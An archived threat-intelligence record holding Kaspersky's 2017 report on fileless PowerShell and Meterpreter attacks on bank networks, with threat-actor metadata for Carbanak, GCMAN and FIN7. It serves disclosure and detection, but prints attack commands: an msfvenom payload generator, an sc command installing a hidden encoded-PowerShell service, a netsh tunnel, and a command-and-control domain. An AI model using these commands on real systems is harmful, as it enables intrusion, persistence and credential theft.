{ "id": "79a368b6-396a-4ea9-89f1-adf01dce9178", "created_at": "2026-04-06T01:28:58.389113Z", "updated_at": "2026-04-10T03:35:16.931026Z", "deleted_at": null, "sha1_hash": "caea65bb7f902811d98ae257c767274fee58b95a", "title": "Fileless attacks against enterprise networks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 754996, "plain_text": "Fileless attacks against enterprise networks\r\nBy GReAT\r\nPublished: 2017-02-08 · Archived: 2026-04-06 00:46:50 UTC\r\nDuring incident response, a team of security specialists needs to follow the artefacts that attackers have left in the\r\nnetwork. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a\r\nlimited timeframe when the required data is available. One reboot of an attacked computer will make memory\r\nacquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated\r\nover time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract\r\ndata up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE)\r\nand memory-based malware to hide their activity during data acquisition. A good example of the implementation\r\nof such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes\r\nthe package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s\r\nwhy memory forensics is critical to the analysis of malware and its functions. Another important part of an attack\r\nare the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or\r\nGCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were\r\nvery excited and impressed when, during an incident response, we found that memory-based malware and\r\ntunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“.\r\nDescription\r\nThis threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the\r\nphysical memory of a domain controller (DC). Kaspersky Lab’s product detection names for such kinds of threat\r\nare MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. Kaspersky Lab participated in the forensic\r\nanalysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry.\r\nAdditionally it was discovered that the NETSH utility as used for tunnelling traffic from the victim’s host to the\r\nattacker´s C2.\r\nWe know that the Metasploit framework was used to generate scripts like the following one:\r\nThis script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM. These\r\nkind of scripts may be generated by using the Metasploit Msfvenom utility with the following command line\r\nhttps://securelist.com/fileless-attacks-against-enterprise-networks/77403/\r\nPage 1 of 6\n\noptions:\r\nmsfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd\r\nAfter the successful generation of a script, the attackers used the SC utility to install a malicious service (that will\r\nexecute the previous script) on the target host. This can be done, for example, using the following command:\r\nsc \\target_name create ATITscUA binpath= “C:Windowssystem32cmd.exe /b /c start /b /min\r\npowershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual\r\nThe next step after installing the malicious service would be to set up tunnels to access to the infected machine\r\nfrom remote hosts, for example using the following command:\r\nnetsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080\r\nlistenaddress=0.0.0.0\r\nThat would result in all network traffic from 10.10.1.11:4444 being forwarded to 10.10.1.12:8080. This technique\r\nof setting up proxy tunnels will provide the attackers with the ability to control any PowerShell infected host from\r\nremote Internet hosts.\r\nThe use of the “SC” and “NETSH” utilities requires administrator privileges both in local and remote host. The\r\nuse of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to\r\nachieve this, attackers used credentials from Service accounts with administrative privileges (for example backup,\r\nservice for remote task scheduler, etc.) grabbed by Mimikatz.\r\nFeatures\r\nThe analysis of memory dumps and Windows registries from affected machines allowed us to restore both\r\nMeterpreter and Mimikatz. These tools were used to collect passwords of system administrators and for the\r\nremote administration of infected hosts.\r\nIn order to get the PowerShell payload used by the attackers from the memory dumps, we used the following\r\nBASH commands:\r\nhttps://securelist.com/fileless-attacks-against-enterprise-networks/77403/\r\nPage 2 of 6\n\ncat mal_powershell.ps1_4 | cut -f12 -d” ” | base64 -di | cut -f8 -d’ | base64 -di | zcat – | cut -f2 -d( | cut -f2 -\r\nd” | less | grep / | base64 -di | hd\r\nResulting in the following payload:\r\nPart of a code responsible for downloading Meterpreter from “adobeupdates.sytes[.]net”\r\nVictims\r\nUsing the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious\r\nPowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and\r\nHEUR:Trojan.Multi.Powecod.a. The table below show the number of infections per country.\r\nhttps://securelist.com/fileless-attacks-against-enterprise-networks/77403/\r\nPage 3 of 6\n\nHowever we cannot confirm that all of them were infected by the same attacker.\r\nAttribution\r\nDuring our analysis of the affected bank we learned that the attackers had used several third level domains and\r\ndomains in the .GA, .ML, .CF ccTLDs. The trick of using such domains is that they are free and missing WHOIS\r\ninformation after domain expiration. Given that the attackers used the Metasploit framework, standard Windows\r\nutilities and unknown domains with no WHOIS information, this makes attribution almost impossible. This\r\nclosest groups with the same TTPs are GCMAN and Carbanak.\r\nConclusions\r\nTechniques like those described in this report are becoming more common, especially against relevant targets in\r\nthe banking industry. Unfortunately the use of common tools combined with different tricks makes detection very\r\nhard.\r\nIn fact, detection of this attack would be possible in RAM, network and registry only. Please check the Appendix I\r\n– Indicators of Compromise section for more details on how to detect malicious activity related to this fileless\r\nPowerShell attack.\r\nAfter successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no\r\nmalware samples are needed for successful exfiltration of a network and how standard and open source utilities\r\nmake attribution almost impossible.\r\nFurther details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on\r\nSt. Maarten from 2 to 6 April, 2017.\r\nhttps://securelist.com/fileless-attacks-against-enterprise-networks/77403/\r\nPage 4 of 6\n\nMore information about this attack is available to customers of Kaspersky APT Intelligence Services. For a\r\nsubscription inquiry, contact: intelreports (at) kaspersky [dot] com.\r\nAppendix I – Indicators of Compromise\r\nTo find the host used by an attacker using the technique described for remote connections and password\r\ncollection, the following paths in the Windows registry should be analyzed:\r\nHKLMSYSTEMControlSet001services – path will be modified after using the SC utility\r\nHKLMSYSTEMControlSet001servicesPortProxyv4tov4tcp – path will be modified after using the NETSH\r\nutility\r\nIn unallocated space in the Windows registry, the following artefacts might be found:\r\npowershell.exe -nop -w hidden -e\r\n10.10.1.12/8080\r\n10.10.1.11/4444\r\nPlease note that these IPs are taken from the IR case in which we participated, so there could be any other IP used\r\nby an eventual attacker. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of\r\nthe NETSH utility for building tunnels.\r\nVerdicts:\r\nMEM:Trojan.Win32.Cometer\r\nMEM:Trojan.Win32.Metasploit\r\nTrojan.Multi.GenAutorunReg.c\r\nHEUR:Trojan.Multi.Powecod\r\nAppendix II – Yara Rules\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nrule msf_or_tunnel_in_registry\r\n{\r\nstrings:\r\n   $port_number_in_registry = \"/4444\"\r\n   $hidden_powershell_in_registry = \"powershell.exe -nop -w hidden\" wide    \r\ncondition:\r\nuint32(0)==0x66676572 and any of them\r\n}\r\nhttps://securelist.com/fileless-attacks-against-enterprise-networks/77403/\r\nPage 5 of 6\n\nSource: https://securelist.com/fileless-attacks-against-enterprise-networks/77403/\r\nhttps://securelist.com/fileless-attacks-against-enterprise-networks/77403/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://securelist.com/fileless-attacks-against-enterprise-networks/77403/" ], "report_names": [ "77403" ], "threat_actors": [ { "id": "c9617bb6-45c8-495e-9759-2177e61a8e91", "created_at": "2022-10-25T15:50:23.405039Z", "updated_at": "2026-04-10T02:00:05.387643Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Carbanak", "Anunak" ], "source_name": "MITRE:Carbanak", "tools": [ "Carbanak", "Mimikatz", "PsExec", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "3b185161-668f-4cac-b930-9482f9706848", "created_at": "2022-10-25T16:07:23.670892Z", "updated_at": "2026-04-10T02:00:04.706866Z", "deleted_at": null, "main_name": "GCMAN", "aliases": [ "G0036" ], "source_name": "ETDA:GCMAN", "tools": [ "GCMAN", "Meterpreter", "VNC", "Virtual Network Computing" ], "source_id": "ETDA", "reports": null }, { "id": "1e408839-27ce-4f52-b7c6-d0a700e54027", "created_at": "2023-01-06T13:46:38.479274Z", "updated_at": "2026-04-10T02:00:02.991414Z", "deleted_at": null, "main_name": "GCMAN", "aliases": [ "G0036" ], "source_name": "MISPGALAXY:GCMAN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf", "created_at": "2023-01-06T13:46:38.405479Z", "updated_at": "2026-04-10T02:00:02.961112Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "ATK32", "G0046", "G0008", "Sangria Tempest", "ELBRUS", "GOLD NIAGARA", "Coreid", "Carbanak", "Carbon Spider", "JokerStash", "CARBON SPIDER" ], "source_name": "MISPGALAXY:FIN7", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ed3810b7-141a-4ed0-8a01-6a972b80458d", "created_at": "2022-10-25T16:07:23.443259Z", "updated_at": "2026-04-10T02:00:04.602946Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Anunak", "Carbanak", "Carbon Spider", "ELBRUS", "G0008", "Gold Waterfall", "Sangria Tempest" ], "source_name": "ETDA:Carbanak", "tools": [ "AVE_MARIA", "Agentemis", "AmmyyRAT", "Antak", "Anunak", "Ave Maria", "AveMariaRAT", "BABYMETAL", "BIRDDOG", "Backdoor Batel", "Batel", "Bateleur", "BlackMatter", "Boostwrite", "Cain \u0026 Abel", "Carbanak", "Cl0p", "Cobalt Strike", "CobaltStrike", "DNSMessenger", "DNSRat", "DNSbot", "DRIFTPIN", "DarkSide", "FOXGRABBER", "FlawedAmmyy", "HALFBAKED", "JS Flash", "KLRD", "MBR Eraser", "Mimikatz", "Nadrac", "Odinaff", "POWERPIPE", "POWERSOURCE", "PsExec", "SQLRAT", "Sekur", "Sekur RAT", "SocksBot", "SoftPerfect Network Scanner", "Spy.Agent.ORM", "TEXTMATE", "TeamViewer", "TiniMet", "TinyMet", "Toshliph", "VB Flash", "WARPRISM", "avemaria", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "fc11deee-6db4-46a9-a3d5-c02bb960cc51", "created_at": "2022-10-25T15:50:23.277991Z", "updated_at": "2026-04-10T02:00:05.400194Z", "deleted_at": null, "main_name": "GCMAN", "aliases": [ "GCMAN" ], "source_name": "MITRE:GCMAN", "tools": null, "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775438938, "ts_updated_at": 1775792116, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/caea65bb7f902811d98ae257c767274fee58b95a.pdf", "text": "https://archive.orkl.eu/caea65bb7f902811d98ae257c767274fee58b95a.txt", "img": "https://archive.orkl.eu/caea65bb7f902811d98ae257c767274fee58b95a.jpg" } }